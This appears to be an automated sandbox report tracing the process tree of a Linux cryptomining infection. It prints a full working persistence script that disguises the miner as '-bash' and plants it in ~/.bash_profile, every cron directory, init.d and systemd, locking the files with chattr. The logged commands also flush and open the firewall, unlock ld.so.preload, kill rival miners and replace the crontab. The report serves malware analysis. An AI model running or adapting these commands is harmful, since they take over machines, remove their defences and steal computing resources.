/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Writes file to tmp directory
PID:2841 -
/usr/bin/idid -u4⤵PID:2842
-
-
/usr/bin/idid -u4⤵PID:2843
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:2844
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:2845
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2846
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:2847
-
-
/usr/bin/idid -u4⤵PID:2848
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2849
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2850
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
PID:2851
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:2852
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:2853
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵PID:2855
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2856
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2857
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2858
-
-
/usr/bin/whichwhich chkconfig4⤵PID:2859
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:2860
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:2861
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵PID:2862
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2863
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2863
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2863
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2863
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2889
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2889
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2889
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2889
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:2915
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2916
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2916
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2916
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2916
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:2942
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:2943
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2945
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2946
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:2947
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:2948
-
-
-
-
/usr/bin/klibsystem5./klibsystem51⤵PID:1777
-
/usr/bin/hostnamehostname -I1⤵PID:2158
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2160
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2165
-
/usr/bin/headhead -n 11⤵PID:2164
-
/usr/bin/grepgrep "Port "1⤵PID:2163
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:2162
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:2174
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:2173
-
/usr/bin/cutcut -d: -f21⤵PID:2172
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2171
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2177
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2180
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2183
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:2553
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2555
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2560
-
/usr/bin/headhead -n 11⤵PID:2559
-
/usr/bin/grepgrep "Port "1⤵PID:2558
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:2557
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:2569
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:2568
-
/usr/bin/cutcut -d: -f21⤵PID:2567
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2566
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2572
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2575
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2578
-
/usr/bin/wcwc -l1⤵PID:2603
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2602
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2601
-
/usr/bin/grepgrep -v grep1⤵PID:2600
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2599
-
/var/tmp/.klibsystem5-x/var/tmp/.klibsystem5-x1⤵
- Executes dropped EXE
PID:2604 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:2608
-
-
/usr/sbin/ufwufw disable2⤵PID:2608
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵PID:2609
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:2610
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:2611
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:2612
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:2613
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵
- Flushes firewall rules
PID:2614
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:2615
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
- Flushes firewall rules
PID:2616
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:2617
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:2618
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:2619
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:2620
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:2621
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵
- Flushes firewall rules
PID:2622
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:2623
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:2624
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:2625
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:2626
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
- Flushes firewall rules
PID:2627
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:2628
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:2629
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:2630
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:2631
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
- Flushes firewall rules
PID:2632
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:2633
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:2634
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:2635
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:2636
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:2637
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
- Flushes firewall rules
PID:2638
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:2639
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:2640
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:2641
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:2642
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:2643
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:2644
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:2645
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
- Flushes firewall rules
PID:2646
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:2647
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:2648
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:2649
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:2650
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:2651
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:2652
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:2653
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:2654
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:2655
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Flushes firewall rules
PID:2656
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
- Flushes firewall rules
PID:2657
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:2658
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:2659
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:2660
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
- Flushes firewall rules
PID:2661
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:2662
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:2663
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:2664
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:2665
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:2666
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:2667
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:2668
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:2669
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:2670
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
- Flushes firewall rules
PID:2671
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:2672
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:2673
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:2674
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:2675
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:2676
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:2677
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:2678
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:2679
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
- Flushes firewall rules
PID:2680
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:2681
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:2682
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:2683
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:2684
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:2685
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:2686
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:2687
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:2688
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:2689
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:2690
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:2691
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:2692
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:2693
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:2694
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:2695
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:2696
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:2697
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:2698
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:2699
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
- Flushes firewall rules
PID:2700
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:2701
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Flushes firewall rules
PID:2702
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:2703
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:2704
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
- Flushes firewall rules
PID:2705
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:2706
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:2707
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
- Flushes firewall rules
PID:2708
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:2709
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
- Flushes firewall rules
PID:2710
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
- Flushes firewall rules
PID:2711
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:2712
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:2713
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:2714
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:2715
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:2716
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:2717
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:2718
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:2719
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:2720
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:2721
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:2722
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:2723
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:2724
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:2725
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
- Flushes firewall rules
PID:2726
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:2727
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:2728
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:2729
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:2730
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:2731
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:2732
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:2733
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:2734
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:2735
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
PID:2736
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:2737
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:2738
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:2739
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:2740
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:2741
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:2742
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
- Flushes firewall rules
PID:2743
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:2744
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:2745
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:2746
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:2747
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:2748
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:2749
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:2750
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
- Flushes firewall rules
PID:2751
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
- Flushes firewall rules
PID:2752
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:2753
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:2754
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:2755
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
- Flushes firewall rules
PID:2756
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:2757
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:2758
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:2759
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:2760
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:2761
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:2762
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:2763
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
- Flushes firewall rules
PID:2764
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:2765
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:2766
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:2767
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:2768
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:2769
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:2770
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:2771
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:2772
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:2773
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵PID:2774
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:2774
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵PID:2775
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:2775
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵PID:2776
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:2776
-
-
/usr/bin/bashbash -c "iptables -F"2⤵PID:2777
-
-
/usr/sbin/iptablesiptables -F2⤵PID:2777
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵PID:2778
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵PID:2778
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
PID:2779
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
PID:2780
-
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:2806
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2808
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2813
-
/usr/bin/headhead -n 11⤵PID:2812
-
/usr/bin/grepgrep "Port "1⤵PID:2811
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:2810
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:2822
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:2821
-
/usr/bin/cutcut -d: -f21⤵PID:2820
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2819
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2825
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2828
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2831
-
/usr/bin/crontabcrontab -r1⤵PID:3307
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
PID:3308
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:3310
-
/usr/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3311
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:3313
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
- Attempts to change immutable files
PID:3314
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:3315
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3316
-
